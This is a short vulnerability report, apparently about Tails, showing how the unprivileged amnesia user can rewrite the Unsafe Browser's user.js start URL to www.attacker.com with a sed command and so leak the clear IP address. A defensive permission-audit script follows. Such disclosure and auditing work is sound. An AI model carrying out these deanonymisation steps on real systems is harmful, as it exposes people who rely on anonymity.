Leak clear IP as low-privileged user amnesia
The Unsafe Browser is another chapter, since it can only be executed via the sudo command. But the unsafe-browser script uses chroot. Yes, chroot is fine if you are inside the chroot jail and want to break out, but it doesn't prevent me from influencing the jail from the host system. So the idea is the following:
- The attacker kills all running processes of /usr/local/lib/tor-browser/firefox.unsafe-browser.
- The attacker runs the Unsafe Browser with sudo /usr/local/sbin/unsafe-browser.
- The attacker checks the file permissions of the Unsafe Browser's Firefox profile with
  ls -la /var/lib/unsafe-browser/chroot/home/amnesia/.unsafe-browser/profile.default/user.js
  which shows the following permissions:
  -rw-r--r-- 1 amnesia amnesia 3329 Mar 28 21:04 /var/lib/unsafe-browser/chroot/home/amnesia/.unsafe-browser/profile.default/user.js
  The file is owned and writable by the low-privileged user amnesia, even though the browser is started via sudo.
- The attacker replaces the default start URL of the Unsafe Browser with his own by running
  sed -i 's/\/usr\/share\/doc\/tails\/website\/misc\/unsafe_browser_warning.en.html/www.attacker.com/g' /var/lib/unsafe-browser/chroot/home/amnesia/.unsafe-browser/profile.default/user.js
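As an added defender-side check (not part of the original report), the following script audits the chroot profile directory for files the unprivileged user can still write before sudo hands them to Firefox. It assumes a Linux host with GNU coreutils (stat -c) and paths without whitespace; the report's own paths appear only in the commented usage line.

```shell
# Added example, not from the original report: find profile files that the
# unprivileged user can modify, which is the precondition for the user.js rewrite.
# Assumes GNU coreutils (stat -c) and file names without whitespace.

# Returns 0 when "$user" can write "$file" judged purely by ownership and mode
# bits (owner-writable as that user, world-writable, or group-writable for one
# of the user's groups); returns 1 otherwise or when the file cannot be stat'ed.
writable_by_user() {
    file="$1"; user="$2"
    info=$(stat -c '%U %G %a' "$file" 2>/dev/null) || return 1
    set -- $info
    owner="$1"; group="$2"; mode="$3"
    # Leading 0 makes the shell parse the stat output as octal.
    if [ "$owner" = "$user" ] && [ $(( 0$mode & 0200 )) -ne 0 ]; then return 0; fi
    if [ $(( 0$mode & 0002 )) -ne 0 ]; then return 0; fi
    if [ $(( 0$mode & 0020 )) -ne 0 ]; then
        for g in $(id -Gn "$user" 2>/dev/null); do
            [ "$g" = "$group" ] && return 0
        done
    fi
    return 1
}

# Walks "$dir", reports every regular file "$user" can write, and returns 0 only
# when nothing writable was found (so it can gate a launcher or a CI check).
audit_profile_dir() {
    dir="$1"; user="$2"; found=0
    for f in $(find "$dir" -type f 2>/dev/null); do
        if writable_by_user "$f" "$user"; then
            echo "WRITABLE by $user: $f ($(stat -c '%U:%G %a' "$f"))"
            found=$((found + 1))
        fi
    done
    [ "$found" -eq 0 ]
}

# Usage on a Tails host, with the profile path and user from the report:
# audit_profile_dir /var/lib/unsafe-browser/chroot/home/amnesia/.unsafe-browser/profile.default amnesia
```

A non-zero exit from audit_profile_dir means the launcher is about to trust a profile that the calling user could have edited.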